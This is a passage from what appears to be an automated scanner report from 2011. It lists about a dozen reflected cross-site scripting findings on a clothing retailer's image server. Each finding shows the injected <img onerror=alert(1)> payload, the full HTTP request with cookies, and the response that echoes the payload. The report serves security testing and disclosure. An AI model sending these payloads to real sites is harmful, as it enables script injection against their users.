Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8731390_sw_004a27e4<img src=a onerror=alert(1)>0524341e47f

3.204. http://images3.pacsun.com/is/image/pacsunproducts/8731390_sw_010 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8731390_sw_010

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f5e6e<img%20src%3da%20onerror%3dalert(1)>e76187f4ae1 was submitted in the REST URL parameter 4. This input was echoed as f5e6e<img src=a onerror=alert(1)>e76187f4ae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8731390_sw_010f5e6e<img%20src%3da%20onerror%3dalert(1)>e76187f4ae1?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8731390_sw_010f5e6e<img src=a onerror=alert(1)>e76187f4ae1

3.205. http://images3.pacsun.com/is/image/pacsunproducts/8744260_01_060 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8744260_01_060

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload edcd6<img%20src%3da%20onerror%3dalert(1)>7a54908e509 was submitted in the REST URL parameter 4. This input was echoed as edcd6<img src=a onerror=alert(1)>7a54908e509 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8744260_01_060edcd6<img%20src%3da%20onerror%3dalert(1)>7a54908e509?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:45 GMT
Connection: close

Unable to find /pacsunproducts/8744260_01_060edcd6<img src=a onerror=alert(1)>7a54908e509

3.206. http://images3.pacsun.com/is/image/pacsunproducts/8744260_sw_060 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8744260_sw_060

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48ebc<img%20src%3da%20onerror%3dalert(1)>5d2a27851a8 was submitted in the REST URL parameter 4. This input was echoed as 48ebc<img src=a onerror=alert(1)>5d2a27851a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8744260_sw_06048ebc<img%20src%3da%20onerror%3dalert(1)>5d2a27851a8?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8744260_sw_06048ebc<img src=a onerror=alert(1)>5d2a27851a8

3.207. http://images3.pacsun.com/is/image/pacsunproducts/8744260_sw_089 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8744260_sw_089

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 9fd08<img%20src%3da%20onerror%3dalert(1)>c0013a8d41f was submitted in the REST URL parameter 4. This input was echoed as 9fd08<img src=a onerror=alert(1)>c0013a8d41f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8744260_sw_0899fd08<img%20src%3da%20onerror%3dalert(1)>c0013a8d41f?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8744260_sw_0899fd08<img src=a onerror=alert(1)>c0013a8d41f

3.208. http://images3.pacsun.com/is/image/pacsunproducts/8747909_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8747909_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 11c3f<img%20src%3da%20onerror%3dalert(1)>5ce85863144 was submitted in the REST URL parameter 4. This input was echoed as 11c3f<img src=a onerror=alert(1)>5ce85863144 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8747909_0111c3f<img%20src%3da%20onerror%3dalert(1)>5ce85863144?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8747909_0111c3f<img src=a onerror=alert(1)>5ce85863144

3.209. http://images3.pacsun.com/is/image/pacsunproducts/8759359_01_066 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8759359_01_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2ea1b<img%20src%3da%20onerror%3dalert(1)>d25a73a3da6 was submitted in the REST URL parameter 4. This input was echoed as 2ea1b<img src=a onerror=alert(1)>d25a73a3da6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8759359_01_0662ea1b<img%20src%3da%20onerror%3dalert(1)>d25a73a3da6?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8759359_01_0662ea1b<img src=a onerror=alert(1)>d25a73a3da6

3.210. http://images3.pacsun.com/is/image/pacsunproducts/8761157_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8761157_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e84a7<img%20src%3da%20onerror%3dalert(1)>970d3c015fe was submitted in the REST URL parameter 4. This input was echoed as e84a7<img src=a onerror=alert(1)>970d3c015fe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8761157_01e84a7<img%20src%3da%20onerror%3dalert(1)>970d3c015fe?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8761157_01e84a7<img src=a onerror=alert(1)>970d3c015fe

3.211. http://images3.pacsun.com/is/image/pacsunproducts/8768160_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8768160_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddf3c<img%20src%3da%20onerror%3dalert(1)>5d5e2808b3a was submitted in the REST URL parameter 4. This input was echoed as ddf3c<img src=a onerror=alert(1)>5d5e2808b3a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8768160_01ddf3c<img%20src%3da%20onerror%3dalert(1)>5d5e2808b3a?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8768160_01ddf3c<img src=a onerror=alert(1)>5d5e2808b3a

3.212. http://images3.pacsun.com/is/image/pacsunproducts/8768632_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8768632_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3e3d3<img%20src%3da%20onerror%3dalert(1)>8202863975f was submitted in the REST URL parameter 4. This input was echoed as 3e3d3<img src=a onerror=alert(1)>8202863975f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8768632_013e3d3<img%20src%3da%20onerror%3dalert(1)>8202863975f?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:42 GMT
Connection: close

Unable to find /pacsunproducts/8768632_013e3d3<img src=a onerror=alert(1)>8202863975f

3.213. http://images3.pacsun.com/is/image/pacsunproducts/8770505_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8770505_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8094<img%20src%3da%20onerror%3dalert(1)>da63b1adfaf was submitted in the REST URL parameter 4. This input was echoed as f8094<img src=a onerror=alert(1)>da63b1adfaf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8770505_01f8094<img%20src%3da%20onerror%3dalert(1)>da63b1adfaf?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:54 GMT
Connection: close

Unable to find /pacsunproducts/8770505_01f8094<img src=a onerror=alert(1)>da63b1adfaf

3.214. http://images3.pacsun.com/is/image/pacsunproducts/8771172_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8771172_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d64c9<img%20src%3da%20onerror%3dalert(1)>0d594fd3396 was submitted in the REST URL parameter 4. This input was echoed as d64c9<img src=a onerror=alert(1)>0d594fd3396 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8771172_01d64c9<img%20src%3da%20onerror%3dalert(1)>0d594fd3396?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8771172_01d64c9<img src=a onerror=alert(1)>0d594fd3396

3.215. http://images3.pacsun.com/is/image/pacsunproducts/8778102_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8778102_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 343d7<img%20src%3da%20onerror%3dalert(1)>dbbe95a5ea3 was submitted in the REST URL parameter 4. This input was echoed as 343d7<img src=a onerror=alert(1)>dbbe95a5ea3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8778102_01343d7<img%20src%3da%20onerror%3dalert(1)>dbbe95a5ea3?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
